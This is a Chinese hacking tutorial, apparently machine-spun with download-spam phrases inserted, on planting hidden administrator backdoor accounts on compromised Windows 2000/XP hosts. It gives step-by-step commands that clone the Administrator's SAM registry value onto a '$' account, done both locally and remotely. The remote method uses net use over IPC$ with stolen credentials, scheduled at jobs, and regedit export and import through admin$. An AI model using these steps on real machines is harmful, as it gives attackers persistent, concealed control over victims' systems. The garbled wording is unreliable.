体系中多种埋没超等用户方式

1、若何正在图形界里成立埋没的超等用户
图形界里下合用当地或者开3389末端办事的肉鸡上。下面我提到的那位做者讲的方式很好,可是较为庞大,借要用到psu.exe(让法式以体系用户身份运转的法式),若是正在肉鸡上的话借要上传psu.exe。我讲的那个方式将不消到psu.exe那个法式。由于Windows2000有两个注册表编纂器:regedit.exe战regedt32.exe。XP中regedit.exe战regedt32.exe真为一个法式,点窜键值的权限时正在左键中面“权限”去点窜。对于regedit.exe我念年夜家皆很熟习,但却不克不及对于注册表的项键配置权限,而regedt32.exe最年夜的长处便是可以或许对于注册表的项键配置权限。NT/2000/xp的帐户疑息皆正在注册表的HKEY_LOCAL_MACHINESAMSAM键下,可是除开xp体系用户SYSTEM 中,别的用户皆没有权检察到内里的疑息,是以我起首用regedt32.exe对于SAM键为我配置为“完整节制”权限。如许便可以对于SAM键内的疑息停止读编辑明晰。详细步散以下:
一、假定咱们因此超等用户administrator登录到开有末端办事的肉鸡上的,起首正在号令止下或者帐户办理器中成立一个帐户:hacker$,那里我正在号令止下成立那个帐户
net user hacker$ 1234 /add
二、正在起头/运转中输出:regedt32.exe并回车去运转regedt32.exe。
三、面“权限”今后会弹出窗心
面增加将我登录时的帐户增加到平安栏内,ghost xp那里我因此administrator的身份登录的,因此我便将administrator插手,并配置权限为 “完整节制”。那里要求讲明一下:最佳是增加您登录的帐户或者帐户地点的组,切莫点窜原本的帐户或者组,不然将会带去一系列没必要要的题目。等埋没超等用户建好以,再去那里将您增加的帐户删除了便可。
四、再面“起头”→“运转”并输出“regedit.exe”回车,启动注册表编纂器regedit.exe。翻开键:
HKEY_LOCAL_MAICHINESAMSAMDomainsaccountusernameshacker$”
五、将项hacker$、0000040九、000001F4导出为hacker.reg、409.reg、1f4.reg,用记事天职别挨那好多个导出的文件停止编纂,将超等用户对于应的项000001F4下的键“F”的值复造,并笼盖hacker$对于应的项00000409下的键“F”的值,而后再将 00000409.reg取hacker.reg归并。
六、正在号令止下履行net user hacker$ /del将用户hacker$删除了:
net user hacker$ /del
七、正在regedit.exe的窗心内按F5革新,xp体系下载而后挨文件-导进注册表文件将点窜好的hacker.reg导进注册表便可
八、到此,埋没的超等用户hacker$已建好了,而后封闭regedit.exe。正在regedt32.exe窗心内把HKEY_LOCAL_MACHINESAMSAM键权限改回本来的模样(只需删除了增加的帐户administrator便可)。
九、注重:埋没的超等用户建好后,正在帐户办理器看没有到hacker$那个用户,正在号令止用“net user”号令也看没有到,可是超等用户成立今后,便不克不及再改暗码了,若是用net user号令去改hacker$的暗码的话,那末正在帐户办理器中将又会看那个埋没的超等用户了,并且不克不及删除了。
2、若何正在号令止下长途成立埋没的超等用户
正在那里将用at的号令,由于用at出现的打算使命因此体系之家身份运转的,因此也用没有到psu.exe法式。为了可以或许应用at号令,肉鸡必需开有 schedule的办事,若是出有开启,可用流光里带的东西netsvc.exe或者sc.exe去长途启动,固然其方式也能够,只需能启动 schedule办事便止。
对号令止体例,您能够采取各类毗连体例,如用SQLexec毗连MSSQL的1433端心,也能够用telnet办事,只需以您能获得一个cmdshell,而且有运转at号令的权限便可以。
一、起首找到一台肉鸡,至于若何去找那没有是我那里所讲的话题。那里先假定找到一台超等用户为administrator,暗码为12345678的肉鸡,此刻咱们起头正在号令止下长途为它成立埋没的超等用户。(例子中的主机是我的局域网内的一台主机,最最新xp体系下载我将它的ip地点改成13.50.97.238,,请勿正在互联网上对于号入坐,以避免骚扰一般的ip地点。)
二、先取肉鸡成立毗连,号令为:net use 13.50.97.238ipc$ “12345678” /user:”administrator
三、用at号令正在肉鸡上成立一个用户(若是at办事出有启动,可用小榕的netsvc.exe或者sc.exe去长途启动):
at 13.50.97.238 12:51 c:winntsystem32net.exe user hacker$ 1234 /add
成立那个减有$符的用户名,是由于减有$符后,号令止下用net user将没有显现那个用户,但正在帐户办理器却能见到那个用户。
四、一样用at号令导出HKEY_LOCAL_MACHINEsamsamDomainsaccountusers下键值:
at 13.50.97.238 12:55 c:winntregedit.exe /e hacker.reg
HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers
/e 是regedit.exe的参数,正在_LOCAL_MACHINESAMSAMDomainsaccountusers那个键的必然要以末端。需要的环境下能够用引号将“c:winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers”引发去。
五、将肉鸡上的hacker.reg下载到本机上用记事本翻开停止编纂号令为:
copy 13.50.97.238admin$system32hacker.reg c:hacker.reg
点窜的方式图形界中已先容过了,那里便没有做先容了。
六、再将编纂好的hacker.reg拷回肉鸡上
copy c:hacker.reg 13.50.97.238admin$system32hacker1.reg
七、检察肉鸡时候:net time 13.50.97.238 而后用at号令将用户hacker$删除了:
at 13.50.97.238 13:40 net user hacker$ /del
八、考证hacker$是不是删除了:用
net use 13.50.97.238 /del 断开取肉鸡的毗连。
net use 13.50.97.238ipc$ “1234” /user:”hacker$” 用帐户hacker$取肉鸡毗连,Ghost xp sp3 不克不及毗连讲明已经删除了。
九、再取肉鸡成立毗连:net use 13.50.97.238ipc$ “12345678” /user:”administrator”再获得肉鸡时候,用at号令将拷回肉鸡的hacker1.reg导进肉鸡注册表:
at 13.50.97.238 13:41 c:winntregedit.exe /s hacker1.reg
regedit.exe的参数/s是指恬静形式。
十、再考证hacker$是不是已经成立,体系下载方式同下面考证hacker$是不是被删除了同样。
十一、再考证用户hacker$是不是有读、编辑、删的权限,若是没有安心,您借可考证是不是能成立别的帐户。
十二、经由过程11能够判定用户hacker$具备超等用户权限,xp体系由于最后我用at号令成立它的时辰是一个通俗用户,而此刻却具备长途读、编辑、删的权限。

发表评论